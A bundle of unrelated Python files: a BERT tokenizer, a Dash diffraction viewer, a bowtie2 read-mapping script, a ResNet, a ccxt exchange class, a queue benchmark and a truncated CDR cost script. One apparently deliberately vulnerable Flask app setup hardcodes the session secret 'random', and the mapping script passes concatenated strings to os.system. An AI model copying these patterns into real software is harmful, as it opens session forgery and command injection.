def __init__(self, vocab_file, do_lower_case=True):
# load_vocab() loads the vocabulary file and builds the token-to-id mapping.
self.vocab = load_vocab(vocab_file)
self.inv_vocab = {v: k for k, v in self.vocab.items()}
# BasicTokenizer() does coarse splitting on whitespace and punctuation;
# WordpieceTokenizer() then splits those tokens further into WordPieces.
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
return convert_by_vocab(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_by_vocab(self.inv_vocab, ids)
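# A minimal usage sketch ("vocab.txt" is a placeholder for a real BERT vocab file):
#   tokenizer = FullTokenizer(vocab_file="vocab.txt", do_lower_case=True)
#   tokens = tokenizer.tokenize("unaffable weather")
#   # e.g. ["un", "##aff", "##able", "weather"], depending on the vocabulary
#   ids = tokenizer.convert_tokens_to_ids(tokens)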
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
self.do_lower_case = do_lower_case
def tokenize(self, text):
"""Tokenizes a piece of text."""
# convert_to_unicode() normalizes the input to unicode.
text = convert_to_unicode(text)
# _clean_text() removes invalid characters and cleans up whitespace.
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
# Split CJK text into individual characters by adding a space before and
# after every Chinese character (see the note above about the multilingual
# and Chinese models).
text = self._tokenize_chinese_chars(text)
# Whitespace tokenization: simply split the text on whitespace.
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower()  # lowercase if requested
token = self._run_strip_accents(token)  # strip accents
split_tokens.extend(self._run_split_on_punc(token))  # split further on punctuation
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
# Strip accents from the text, e.g. the acute accent on the 'e' in 'café'.
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
# Drop characters whose unicode category is Mn (nonspacing combining marks,
# i.e. the accent marks themselves).
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):  # check whether the character is punctuation
# Each punctuation character becomes its own one-element group, so e.g.
# "I'm" ends up as ["I", "'", "m"] after the join below.
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
    # Split CJK text into single characters: _is_chinese_char() decides whether a
    # character is Chinese, and whitespace is added around every such character.
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
    # like all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
    # Remove invalid characters and clean up whitespace
output = []
for char in text:
      # cp is the codepoint; codepoint 0 is an invalid character,
      # 0xfffd (U+FFFD) renders as � and is the usual replacement for unknown characters,
      # and _is_control() checks for control characters (characters such as \n that control behaviour rather than print)
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
      # If the character is any kind of whitespace, replace it with a plain space
if _is_whitespace(char):
output.append(" ") # 把whitespace变成空格
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenziation."""
def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
    # Split a piece of text into word pieces using a greedy longest-match-first algorithm
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
        already been passed through `BasicTokenizer`.
Returns:
A list of wordpiece tokens.
"""
text = convert_to_unicode(text)
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
        output_tokens.append(self.unk_token)  # longer than the configured maximum, replace with [UNK]
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr # ##表示这个词是接着前面的,这样使得WordPiece切分是可逆的——我们可以恢复出“真正”的词。
if substr in self.vocab:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
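# A tiny worked example of the greedy longest-match-first behaviour above (hypothetical
# helper with a toy vocabulary, not part of the original module).
def _demo_wordpiece_greedy_match():
  toy_vocab = {"un": 0, "##aff": 1, "##able": 2, "[UNK]": 3}
  tokenizer = WordpieceTokenizer(vocab=toy_vocab)
  # "unaffable" is consumed as the longest prefixes found in the vocabulary.
  assert tokenizer.tokenize("unaffable") == ["un", "##aff", "##able"]
  # A token that cannot be covered by vocabulary pieces collapses to the unk_token.
  assert tokenizer.tokenize("xyz") == ["[UNK]"]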
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
  # \t, \n, and \r are technically control characters but we treat them
# as whitespace since they are generally considered as such.
  # Here category "Zs" plus space, tab, newline and carriage return are treated as whitespace
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
  # Check whether char is a control character
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
  # Strictly speaking tab, newline and carriage return are control characters, but here they are treated as whitespace, presumably because that is more convenient for downstream text handling.
if char == "\t" or char == "\n" or char == "\r":
return False
  # unicodedata.category() returns the Unicode category; "Cc" and "Cf" are treated as control characters here.
cat = unicodedata.category(char)
if cat in ("Cc", "Cf"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
  # Decide whether a character counts as punctuation
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
  # Any category starting with "P" is punctuation
if cat.startswith("P"):
return True
return False
|
import os
import connexion
from flask_sqlalchemy import SQLAlchemy
vuln_app = connexion.App(__name__, specification_dir='./openapi_specs')
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(vuln_app.root_path, 'database/database.db')
vuln_app.app.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI
vuln_app.app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
vuln_app.app.config['SECRET_KEY'] = 'random'
# start the db
db = SQLAlchemy(vuln_app.app)
vuln_app.add_api('openapi3.yml')
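# A minimal sketch for running the app directly (assumption: the default Flask dev
# server and port 8080 are acceptable); connexion's App.run() starts the server.
if __name__ == '__main__':
    vuln_app.run(port=8080, debug=True)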
|
from .rpc_backends import *
from .rpc_batch import *
from .rpc_constructors import *
from .rpc_digestors import *
from .rpc_executors import *
from .rpc_executors_async import *
from .rpc_format import *
from .rpc_lifecycle import *
from .rpc_provider import *
from .rpc_registry import *
from .rpc_request import *
from .rpc_spec import *
|
import numpy as np
import funcs as fun
from plotly.subplots import make_subplots
import plotly.graph_objects as go
from dash import Dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Output, Input
app = Dash(__name__)
#Layout Data
p1 = dict({'ss':'Slit Width = ', 'ds':'Slit Width = ', 'w':'Wire Diameter = ',
'1dg':'Slit Width = ', 'c':'Radius = ', 'tg':'Side = ', 'sq':'Side = ',
'2dg':'Slit Width = ', 'hex':'None', '2dg2':'Slit Side = ', 'lg':'Relative Angle = '})
p2 = dict({'ss':'None', 'ds':'Separation = ', 'w':'None',
'1dg':'None', 'c':'None', 'tg':'None', 'sq':'None', '2dg':'None',
'hex':'None', '2dg2':'None', 'lg':'None'})
#Layout
app.layout = html.Div([
html.H1("Fraunhofer Diffraction Patterns (v0.1)", style={'text-align': 'center'}),
html.Div(id='fixed',children='Fixed Parameters : Wavelength = 532 nm, z = 1.5 m, Beam profile - Gaussian, Beam waist = 100 microns'),
html.Div(id='note',children='(Note : The contrast at output has been slightly exaggerated for better visibility.)'),
html.Br(),
dcc.Dropdown(
id='Slit Type',
options = [
{'label':'Single Slit', 'value':'ss'},
{'label':'Double Slit', 'value':'ds'},
{'label':'Wire', 'value':'w'},
{'label':'1-d Grating', 'value':'1dg'},
{'label':'2-d Grating', 'value':'2dg'},
{'label':'2-d Grating, Type 2', 'value':'2dg2'},
{'label':'Laser Grating', 'value':'lg'},
{'label':'Circular', 'value':'c'},
{'label':'Triangular', 'value':'tg'},
{'label':'Square', 'value':'sq'},
{'label':'Hexagon', 'value':'hex'}
],
value = 'ss'
),
html.Br(),
html.Div(id='param1', children=[]),
dcc.Slider(
id='Slit Width',
min=8,
max=256,
step=8,
value=32,
marks={},
),
html.Div(id='param2', children=[]),
dcc.Slider(
id='Slit Separation',
min=8,
max=256,
step=8,
value=64,
),
#html.Div(id='output_container', children=[]),
#html.Br(),
dcc.Graph(id='plots', figure={}),
html.Img(id='image', src=[],height=262,width=315),
html.Div(children='Actual image'),
html.Br(), html.Br(),
html.Div(id='contact', children='Please report any problems to harishss@iitk.ac.in. Thanks! The source code can be found '),
html.A(id='url',children='here.', href='https://github.com/harishss3/Diffraction')
])
#Callback
@app.callback(
[Output(component_id='plots', component_property='figure'),
Output(component_id='Slit Width', component_property='min'),
Output(component_id='Slit Width', component_property='max'),
Output(component_id='Slit Width', component_property='step'),
Output(component_id='param1', component_property='children'),
Output(component_id='param2', component_property='children'),
Output(component_id='Slit Width', component_property='marks'),
Output(component_id='image', component_property='src')],
[Input(component_id='Slit Width', component_property='value'),
Input(component_id='Slit Separation', component_property='value'),
Input(component_id='Slit Type', component_property='value'),]
)
def update_plots(a,d,st):
fig,amin,amax,astep = fun.plot(st,a,d)
if st != 'tg':
source = None
else:
source = app.get_asset_url('triangle.jpg')
if st != 'lg':
mks = dict()
else:
mks = dict({36.9:'36.9', 53.1:'53.1'})
val1 = ''
val2 = ''
if p1[st] != 'None':
val1 = str(a)+' microns'
if st == 'lg':
val1 = str(a) + ' degrees'
if p2[st] != 'None':
val2 = str(d)+' microns'
return go.Figure(data=fig),amin,amax,astep,p1[st]+val1,p2[st]+val2,mks,source
if __name__ == '__main__':
app.run_server(debug=True)
|
#!/usr/bin/python
import sys, os, re
import sequence_basics, aligner_basics, sam_basics, genepred_basics
# Pre: <genome> - A fasta of the genome we are working with
# <uniquely named short reads file> - can be generated by ./make_uniquely_named_short_read_file.py
# can be a fastq or a fasta, and each name must be different
# <transcriptome file> - A gene pred file containing definitions of different isoforms
# The names (column 2) of this file should be unique, and this is often not the case with the files that are downloaded
# <output file> - File to write the results to (see post)
# <temp folder name> - Name of a temporary folder we can work in
# (optional)<genome bowtie2 index>
# (optional)<transcriptome bowtie2 index> - This must be built on the directionless fasta generated from the <transcriptome file> genepred file
# Post: Writes results to <output file>, and is two columns
# <read name> <mapping count>
# So zero is unmapped to either genome or transcriptome,
# 1 is uniquely mapped to only one of them.
# 2 or more is a multimapped read.
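# Example of the expected <output file> contents (hypothetical read names):
#   read_0001   0    <- unmapped to both genome and transcriptome
#   read_0002   1    <- uniquely mapped
#   read_0003   3    <- multi-mapped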
def main():
if len(sys.argv) < 6:
print sys.argv[0] + ' <genome> <uniquely named short reads file> <transcriptome file> <output file> <temp directory>'
sys.exit()
genome_filename = sys.argv[1]
sruniq_filename = sys.argv[2]
transcriptome_filename = sys.argv[3]
output_file = sys.argv[4]
temp_foldername = sys.argv[5]
genome_bowtie2_index = ''
if len(sys.argv) >= 7: genome_bowtie2_index = sys.argv[6]
transcriptome_bowtie2_index = ''
#if len(sys.argv) == 8: transcriptome_bowtie2_index = sys.argv[7]
if not os.path.isdir(temp_foldername):
print "Error: Expecting a temporary folder that already exists."
print temp_foldername + " does not exist."
sys.exit()
#1. Make a sub-directory to do our work in
local_temp_foldername = temp_foldername.rstrip('/')+'/uniqueness'
if not os.path.isdir(local_temp_foldername):
print "Creating subdirectory "+local_temp_foldername
os.system("mkdir "+local_temp_foldername)
#2. map reads to the genome fasta
genome_base_name = local_temp_foldername.rstrip('/')+'/genome'
sam_filename = local_temp_foldername.rstrip('/')+'/genome.sam'
map_reads_to_fasta(genome_filename,sruniq_filename,genome_base_name,genome_bowtie2_index)
#3. count number of times we observe reads
read_counts = read_map_count(sruniq_filename, sam_filename)
#4. get unmapped reads into a fasta
unmapped_read_names = get_unmapped_read_names(read_counts)
unmapped_sruniq_filename = make_unmapped_short_read_file(sruniq_filename,unmapped_read_names,local_temp_foldername)
#4. Make a fasta based on a transcriptome genepred file
  # first ensure the assumption that the genepred file contains only uniquely named transcripts
transcriptome_uniquename_filename = local_temp_foldername.rstrip('/')+'/txn_uniq.gpd'
genepred_basics.write_uniquely_named_genepred(transcriptome_filename,transcriptome_uniquename_filename)
transcriptome_fa = local_temp_foldername.rstrip('/')+'/txn.fa'
genepred_basics.write_genepred_to_fasta_directionless(transcriptome_uniquename_filename,genome_filename,transcriptome_fa)
#5. Mapping previously unmapped reads to the transcriptome
txn_base_name = local_temp_foldername.rstrip('/')+'/txn'
txn_sam_filename = local_temp_foldername.rstrip('/')+'/txn.sam'
map_reads_to_fasta(transcriptome_fa,unmapped_sruniq_filename,txn_base_name,transcriptome_bowtie2_index)
#6. Convert coordinates of the mapped reads back to reference
  # Note these coordinates are zero indexed for both start and end coordinates.
txn_map_filename = local_temp_foldername.rstrip('/') + '/txn.map'
sam_basics.convert_directionless_gpd_alignment_to_reference(txn_sam_filename, transcriptome_uniquename_filename,txn_map_filename)
  #7. Consolidate repetitive read mappings caused by repeated junctions among isoforms
txn_uniq_map_filename = local_temp_foldername.rstrip('/') + '/txn_uniq.map'
# we are only interested in the unique coordinate sets for each entry
os.system("cat "+txn_map_filename+" | cut -f 1,3 | sort | uniq > "+txn_uniq_map_filename)
#8. Add transcriptome mapping counts
transcriptome_read_counts = get_transcriptome_read_counts(txn_uniq_map_filename)
#add those transcriptome_read_counts to our previous read counts
for name in transcriptome_read_counts: read_counts[name]+=transcriptome_read_counts[name]
#9. finished! Now we can print the reads and their counts
ofile = open(output_file,'w')
for name in read_counts:
ofile.write(name + "\t" + str(read_counts[name])+"\n")
ofile.close()
# pre: transcriptome read mapping (of previously unmapped reads) in the format
# <read name> <chromosome:coord1-coord2,coord3-coord4>
# post: for each read name, count the number of times it is seen and return the counts in a dictionary
def get_transcriptome_read_counts(txn_uniq_map_filename):
c = {}
with open(txn_uniq_map_filename) as tfile:
for line in tfile:
[name,coords] = line.rstrip().split("\t")
if name not in c: c[name] = 0
c[name]+=1
return c
# pre: short read filename where all names are unique (can be fasta or fastq,
#      but if it's fasta, it must end in .fasta or .fa), a list of short read names,
#      and the temp folder to write the output file into
# post: writes out a file of the short reads
def make_unmapped_short_read_file(sr_filename, names,tempfolder):
isfasta = re.search('\.fa$|\.fasta$',sr_filename)
outfile = tempfolder.rstrip('/')+'/'+'unmapped_shortread'
if isfasta:
outfile = outfile + '.fa'
sequence_basics.write_fasta_subset(sr_filename,names,outfile)
else:
outfile = outfile + '.fq'
sequence_basics.write_fastq_subset(sr_filename,names,outfile)
return outfile
# pre: dictionary containing read names and the number of times they were mapped
# post: a list of unmapped read names
# modifies: none
def get_unmapped_read_names(read_counts):
names = []
for name in read_counts:
if read_counts[name] == 0:
names.append(name)
return names
# pre: short read filename with uniquely named reads, sam file name
# post: mapped reads and their counts in a dictionary keyed on read name
def read_map_count(sruniq_filename,sam_filename):
print "get dictionary of names"
reads = get_initialized_read_names(sruniq_filename)
print "iterate over sam file counting reads"
with open(sam_filename) as f:
for line in f:
line = line.rstrip()
m = re.match('^@[A-Z][A-Z][\s]',line) #check for header
if not m:
[name,coordinate] = sam_basics.get_coordinates(line)
if coordinate != '':
reads[name]+=1
return reads
# pre: short read file with uniquely named reads (fasta or fastq)
# if fasta, it needs extension fa or fasta
# post: a dictionary with read names as keys and entries set to zero
# modifies: none
def get_initialized_read_names(sruniq_filename):
reads = {}
if re.search('\.fa$|\.fasta$',sruniq_filename):
reads = sequence_basics.counts_by_name_from_fasta(sruniq_filename)
else:
reads = sequence_basics.counts_by_name_from_fastq(sruniq_filename)
for name in reads:
reads[name] = 0
return reads
# pre: temporary folder name, genome fasta file name,
# file of short reads (fasta or fastq)
# post: temporary folder containing genome.sam sam file of alignments
# modifies: builds an index for the genome fasta in the temporary folder
# automatically sets processor count to use
def map_reads_to_fasta(fasta_filename,sr_name,base_name,bowtie2_index_base):
sam_name = base_name + '.sam'
#1. See if we need an index. this could be skipped if it is given as an input
if bowtie2_index_base == '':
print "create a bowtie2 index"
aligner_basics.build_bowtie2_index(fasta_filename,base_name)
bowtie2_index_base = base_name
#2. We align the reads
print "align short reads to index with bowtie2"
aligner_basics.bowtie2_unpaired(sr_name,bowtie2_index_base,sam_name)
return sam_name
main()
|
import torch.nn as nn
import math
import torch.utils.model_zoo as model_zoo
import modified_linear
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, last=False):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
self.last = last
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
if not self.last: #remove ReLU in the last layer
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2, last_phase=True)
self.avgpool = nn.AvgPool2d(7, stride=1)
self.fc = modified_linear.CosineLinear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1, last_phase=False):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
if last_phase:
for i in range(1, blocks-1):
layers.append(block(self.inplanes, planes))
layers.append(block(self.inplanes, planes, last=True))
else:
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def resnet18(pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
return model
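# A minimal forward-pass sketch (assumptions: torch is installed and
# modified_linear.CosineLinear maps the 512 pooled features to num_classes logits);
# note that the `pretrained` flag above is accepted but no weights are loaded here.
def _demo_resnet18_forward():
    import torch
    model = resnet18(num_classes=10)
    dummy = torch.randn(2, 3, 224, 224)  # batch of two 224x224 RGB images
    logits = model(dummy)
    assert logits.shape == (2, 10)
    return logits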
|
# -*- coding: utf-8 -*-
from ccxt.bittrex import bittrex
import math
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import DDoSProtection
class bleutrade (bittrex):
def describe(self):
return self.deep_extend(super(bleutrade, self).describe(), {
'id': 'bleutrade',
'name': 'Bleutrade',
'countries': 'BR', # Brazil
'rateLimit': 1000,
'version': 'v2',
'has': {
'CORS': True,
'fetchTickers': True,
'fetchOHLCV': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/30303000-b602dbe6-976d-11e7-956d-36c5049c01e7.jpg',
'api': {
'public': 'https://bleutrade.com/api',
'account': 'https://bleutrade.com/api',
'market': 'https://bleutrade.com/api',
},
'www': 'https://bleutrade.com',
'doc': 'https://bleutrade.com/help/API',
'fees': 'https://bleutrade.com/help/fees_and_deadlines',
},
'fees': {
'funding': {
'ADC': 0.1,
'BTA': 0.1,
'BITB': 0.1,
'BTC': 0.001,
'BCH': 0.001,
'BTCD': 0.001,
'BTG': 0.001,
'BLK': 0.1,
'CDN': 0.1,
'CLAM': 0.01,
'DASH': 0.001,
'DCR': 0.05,
'DGC': 0.1,
'DP': 0.1,
'DPC': 0.1,
'DOGE': 0.0,
'EFL': 0.1,
'ETH': 0.01,
'EXP': 0.1,
'FJC': 0.1,
'BSTY': 0.001,
'GB': 0.1,
'NLG': 0.1,
'HTML': 1.0,
'LTC': 0.001,
'MONA': 0.01,
'MOON': 1.0,
'NMC': 0.015,
'NEOS': 0.1,
'NVC': 0.05,
'OK': 0.1,
'PPC': 0.1,
'POT': 0.1,
'XPM': 0.001,
'QTUM': 0.1,
'RDD': 0.1,
'SLR': 0.1,
'START': 0.1,
'SLG': 0.1,
'TROLL': 0.1,
'UNO': 0.01,
'VRC': 0.1,
'VTC': 0.1,
'XVP': 0.1,
'WDC': 0.001,
'ZET': 0.1,
},
},
})
def fetch_markets(self):
markets = self.publicGetMarkets()
result = []
for p in range(0, len(markets['result'])):
market = markets['result'][p]
id = market['MarketName']
base = market['MarketCurrency']
quote = market['BaseCurrency']
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = base + '/' + quote
precision = {
'amount': 8,
'price': 8,
}
active = market['IsActive']
result.append(self.extend(self.fees['trading'], {
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': active,
'info': market,
'lot': math.pow(10, -precision['amount']),
'precision': precision,
'limits': {
'amount': {
'min': market['MinTradeSize'],
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': 0,
'max': None,
},
},
}))
return result
def get_order_id_field(self):
return 'orderid'
def fetch_order_book(self, symbol, params={}):
self.load_markets()
response = self.publicGetOrderbook(self.extend({
'market': self.market_id(symbol),
'type': 'ALL',
'depth': 50,
}, params))
orderbook = response['result']
return self.parse_order_book(orderbook, None, 'buy', 'sell', 'Rate', 'Quantity')
def throw_exception_on_error(self, response):
if 'message' in response:
            if response['message'] == 'Insufficient funds!':
raise InsufficientFunds(self.id + ' ' + self.json(response))
if response['message'] == 'MIN_TRADE_REQUIREMENT_NOT_MET':
raise InvalidOrder(self.id + ' ' + self.json(response))
if response['message'] == 'APIKEY_INVALID':
if self.hasAlreadyAuthenticatedSuccessfully:
raise DDoSProtection(self.id + ' ' + self.json(response))
else:
raise AuthenticationError(self.id + ' ' + self.json(response))
if response['message'] == 'DUST_TRADE_DISALLOWED_MIN_VALUE_50K_SAT':
raise InvalidOrder(self.id + ' order cost should be over 50k satoshi ' + self.json(response))
|
"""Counts the time of transferring an object to the queue and reading it from it.
Compares different implementations: torch tensor, numpy array, with and without shared memory.
Run: `python -m tests.perf.queue_transfer`
"""
import multiprocessing as mp
import time
from multiprocessing import Queue
import logging
import torch
from aqueduct.shm import SharedFieldsMixin
from .utils import (
ImViewType,
MAGIC_NUMBER,
MPType,
StopProcess,
get_image,
get_mp_classes,
timeit,
)
class BaseTask:
def __init__(self, image):
self.im = image
class Task(SharedFieldsMixin, BaseTask):
pass
def worker(q_in: Queue):
while True:
try:
start, task = q_in.get()
except TypeError:
break
assert task.im[0][0][0] == MAGIC_NUMBER
logging.info(f'queue transfer time: {(time.monotonic() - start) * 10**3:.4f}')
        # For a correct timing measurement: drop the reference so the gc can delete the task and
        # return the shared memory to the OS right after the task is processed, instead of only
        # after the next task is received from the queue via q_in.get()
        # todo: discuss that unlink takes as long as, or longer than, transferring the object;
        # this is probably not critical, since that time is negligible compared to the time spent working with the object
task = None
def run(view_type: ImViewType, mp_type: MPType, share: bool = False):
logging.info(f'{view_type.value} image, {mp_type.value} multiprocessing, share: {share}')
q_class, p_class = get_mp_classes(mp_type)
task_type = Task if view_type == ImViewType.NUMPY and share else BaseTask
q_task = q_class()
p = p_class(target=worker, args=(q_task,))
p.start()
for _ in range(10):
im = get_image()
if view_type == ImViewType.NUMPY:
if share:
with timeit() as t:
task = task_type(im)
task.share_value('im')
else:
with timeit() as t:
task = task_type(im)
elif view_type == ImViewType.TT:
if share:
with timeit() as t:
tensor = torch.from_numpy(im)
np_array = tensor.numpy()
# it takes less than 0.1 ms
# logging.info(f'tensor converting time, ms: {t.seconds * 10 ** 3:.4f}')
with timeit() as t:
task = task_type(tensor)
task.im.share_memory_()
else:
with timeit() as t:
task = task_type(torch.from_numpy(im))
logging.info(f'task creating time, ms: {t.seconds * 10**3:.4f}')
q_task.put((time.monotonic(), task))
time.sleep(0.001)
q_task.put(StopProcess())
p.join()
def main():
run(ImViewType.NUMPY, MPType.PYTHON)
run(ImViewType.TT, MPType.TORCH)
run(ImViewType.TT, MPType.TORCH, True)
run(ImViewType.NUMPY, MPType.PYTHON, True)
if __name__ == '__main__':
mp.set_start_method('fork')
main()
|
import pandas as pd
import numpy as np
import warnings
import io
import itertools
import yaml
import math
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import os
# read csv data
#df = pd.read_excel('./assessment/output/fig2.9_data_table.xlsx')
df = pd.read_csv('./assessment/output/CombinedCsvsWithOutcome.csv')
# drop the negative negatives
#df = df[df.Variable != 'Emissions|CO2|Net-negative-negative']
yrs = np.linspace(2020,2100,17) # every 5 years included
print(df.Variable.unique())
print(df.shape)
x = df.groupby(['model', 'scenario']).size().reset_index().rename(columns={0:'count'})
print(type(x))
print(x.iloc[0])
print(x.iloc[0].model)
print(len(x))
#newRows = make a new dataframe/new rows for dac
for n in range(len(x)):
y = df[df.model == x.iloc[n].model]
y = y[y.scenario == x.iloc[n].scenario].drop(columns = ['model', 'scenario', 'Unnamed: 0', 'marker', 'category'])
t = y[y.Variable == 'Total CDR'].drop(columns=['Variable']).values
a = y[y.Variable == 'AFOLU CDR'].drop(columns=['Variable']).values
b = y[y.Variable == 'BECCS'].drop(columns=['Variable']).values
nn = y[y.Variable == 'Net negative CO2'].drop(columns=['Variable']).values
c = y[y.Variable == 'Compensate CDR'].drop(columns=['Variable']).values
if a.size == 0:
d = np.round(t-b,4)
elif b.size == 0:
d = np.round(t-a, 4)
else:
d = np.round((t-(a+b)),4)
print(d)
print(np.sum(d))
#if np.sum(d)>0:
#print(df.groupby(['model', 'scenario']).count())
# check to see how much DAC is included
dfcost = df # make a copy
afolu_cost = 50 #$/ton
ccs_biomass = 80 #$/ton
ccs_dac = 100 #$/ton
ccs_ew = 100 #$/ton I have no idea on this one
ccs_other = 100 # need to figure out if net negative is just unspecified get rid of it or what the deal is
# calculate costs for different types of ccs
for n in range(len(dfcost)):
if dfcost.Variable.iloc[n] == 'AFOLU CDR':
c = afolu_cost
elif dfcost.Variable.iloc[n] == 'BECCS':
c = ccs_biomass
